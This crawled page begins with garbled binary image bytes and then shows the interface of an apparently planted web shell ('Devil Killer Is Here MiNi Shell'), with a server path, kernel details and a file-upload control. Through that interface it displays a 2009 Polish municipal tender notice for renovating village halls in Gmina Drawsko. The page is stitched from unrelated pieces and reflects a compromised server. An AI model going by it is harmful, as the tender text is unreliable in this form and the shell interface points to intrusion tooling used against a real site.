JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090916/320652-N-2009.html

<p class="kh_header"><b>Drawsko: Remont i przebudowa sal wiejskich w Gminie Drawsko</b><br>
<b>Numer ogłoszenia: 320652 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Drawsko , ul. Powstańców Wielkopolskich 121, 64-733 Drawsko, woj. wielkopolskie, tel. 067 2569128, faks 067 2569135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-drawsko.prv.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa sal wiejskich w Gminie Drawsko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Remont i przebudowa sal wiejskich w Gminie Drawsko
                                                                                                        
ZAKRES PRAC obejmuje:
 1)  Sala wiejska w Chełście:
- wymiana okien z wykonaniem filarków międzyokiennych
- wykonanie pokrycia dachu z blachy trapezowej z wymianą rynien
- przemurowanie komina ponad dachem
- malowanie elewacji 
- remont pomieszczeń sali
2)  Sala wiejska w Pęckowie
- wymiana stolarki zewnętrznej
- docieplanie ścian zewnętrznych
- pokrycie dachu papą termozgrzewalną, uzupełnienie obróbek
- remont Sali widowiskowej
- remont WC z przystosowaniem dla osoby niepełnosprawnej
- wymiana kotła c.o. wraz z osprzętem
- plac zabaw ( zestaw zabawowy z dwiema wieżami + tablica z regulaminem)
3) Świetlica w Moczydłach
- roboty rozbiórkowe 
- roboty ziemne
- ławy betonowe, mury fundamentowe
- roboty murarskie
- wieńce żelbetowe
- wykonanie dachu
- roboty instalacyjne
- posadzki
- stolarka otworowa
- docieplanie ścian
- roboty zewnętrzne
- roboty elektryczne

2.Każdy z Wykonawców winien odwiedzić miejsce inwestycji celem sprawdzenia stanu budynków, placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu.
3.Oznaczenie wg Wspólnego Słownika Zamówień: kod 45400000-1. 45262700-8.
4.Szczegóły prac określa przedmiar robót, zbiorcze zestawienie robocizny, zbiorcze zestawienie materiałów oraz zbiorcze zestawienie sprzętu oraz, stanowiące załącznik do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.26.27.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> . Oferta powinna być zabezpieczona wadium w kwocie 10000,00zł 
(słownie: dziesięćtysięcyzłotych 00/100). 
2. Wadium może być wniesione w zależności od wyboru Wykonawcy: 
a) w pieniądzu wpłaconym przelewem na konto zamawiającego w BS Wieleń nr 41896000030000212120000040, 
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym. 
c) w gwarancjach bankowych, 
d) w gwarancjach ubezpieczeniowych.
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. z 2007 r. Nr 42, poz.275).
3. W przypadku wniesienia wadium w pieniądzu na konto Zamawiającego wadium winno być na koncie nie później niż przed upływem terminu składania ofert.
Dowód potwierdzenia złożenia wadium należy załączyć do oferty.
4. W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć nie później niż przed upływem terminu składania ofert. Oryginał dokumentu należy złożyć w sekretariacie Urzędu Gminy Drawsko- pokój nr 10. Kopię dokumentu należy dołączyć do oferty. .
 Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).Z treści gwarancji winno wynikać bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy. 
5. Zamawiający zwraca niezwłocznie wadium, licząc od dnia, w którym: 
a) upłynął termin związania oferty, 
b) zawarto umowę, 
c) Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich składania. 
6. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy: 
a) który wycofał ofertę przed upływem terminu do składania ofert, 
b) który został wykluczony z postępowania, 
c) którego oferta została odrzucona. 
7. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówi podpisania umowy na warunkach wskazanych w ofercie, 
b) nie wniesie wymaganego zabezpieczenia wykonania umowy bądź zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. W tym celu Wykonawca składa stosowne oświadczenie podpisane przez osoby uprawnione do jego reprezentowania na formularzu stanowiącym załącznik nr 3 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
       2. Dla potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca powinien przedłożyć niżej wymienione dokumenty: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b) pełnomocnictwo do złożenia oferty, jeżeli prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą, 
c) aktualne zaświadczenie właściwego Urzędu Skarbowego oraz właściwego Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
d) wykaz wykonanych w okresie ostatnich 5 lat podobnych robót budowlanych o tożsamym charakterze tj. budowę, przebudowę lub remont budynków z podaniem wartości zamówienia, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie. Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże zrealizowanie co najmniej 2 zadań w zakresie podobnych robót budowlanych o wartości min. 500.000,00 zł. W tym celu Wykonawca powinien wypełnić i załączyć do oferty formularz stanowiący załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia,
e) umowy regulujące współpracę podmiotów występujących wspólnie,
f) referencje, zawierające opinię o zrealizowanych zamówieniach. Referencje winny być wystawione przez Zamawiających.
g) polisy lub inne dokumenty ubezpieczenia potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 500.000,00 zł.
h) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
i) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
j) zaakceptowany, przez podpisanie każdej strony, bez dokonywania jakichkolwiek zmian, wzór umowy ( projekt ) - załącznik nr 6.
            3. Wykonawca zapewnia nadzór kierownika budowy posiadającego stosowne- niezbędne uprawnienia budowlane do kierowania robotami budowlanymi o specjalności budowlanej oraz osoby posiadające uprawnienia o specjalności elektrycznej i sanitarnej - załącznik nr 5.  Do oferty winny być dołączone dokumenty potwierdzające kwalifikacje.
4. Wykonawca może złożyć ww dokumenty w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałem przez Wykonawcę lub pełnomocnego przedstawiciela Wykonawcy. 
5. Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom, w formularzu oferty należy wskazać części zamówienia, które Wykonawca powierzy Podwykonawcom ( nie mogą przekraczać 30 % wartości całego zamówienia).
6. Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców zostanie dokonana według formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca powinien przedłożyć niżej wymienione dokumenty: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b) pełnomocnictwo do złożenia oferty, jeżeli prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą, 
c) aktualne zaświadczenie właściwego Urzędu Skarbowego oraz właściwego Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
d) wykaz wykonanych w okresie ostatnich 5 lat podobnych robót budowlanych o tożsamym charakterze tj. budowę, przebudowę lub remont budynków z podaniem wartości zamówienia, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie. Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże zrealizowanie co najmniej 2 zadań w zakresie podobnych robót budowlanych o wartości min. 500.000,00 zł. W tym celu Wykonawca powinien wypełnić i załączyć do oferty formularz stanowiący załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia,
e) umowy regulujące współpracę podmiotów występujących wspólnie,
f) referencje, zawierające opinię o zrealizowanych zamówieniach. Referencje winny być wystawione przez Zamawiających.
g) polisy lub inne dokumenty ubezpieczenia potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 500.000,00 zł.
h) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
i) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
j) zaakceptowany, przez podpisanie każdej strony, bez dokonywania jakichkolwiek zmian, wzór umowy ( projekt ) - załącznik nr 6.
            3. Wykonawca zapewnia nadzór kierownika budowy posiadającego stosowne- niezbędne uprawnienia budowlane do kierowania robotami budowlanymi o specjalności budowlanej oraz osoby posiadające uprawnienia o specjalności elektrycznej i sanitarnej - załącznik nr 5.  Do oferty winny być dołączone dokumenty potwierdzające kwalifikacje.
4. Wykonawca może złożyć ww dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub pełnomocnego przedstawiciela Wykonawcy. 
5. Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom, w formularzu oferty należy wskazać części zamówienia, które Wykonawca powierzy Podwykonawcom ( nie mogą przekraczać 30 % wartości całego zamówienia)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminadrawsko.pl i BIP www.bip.gminadrawsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Drawsko, ul. Powstańców Wielkopolskich 121, pokój nr 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 09:45, miejsce: Urząd Gminy Drawsko, ul. Powstańców Wielkopolskich 121 pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com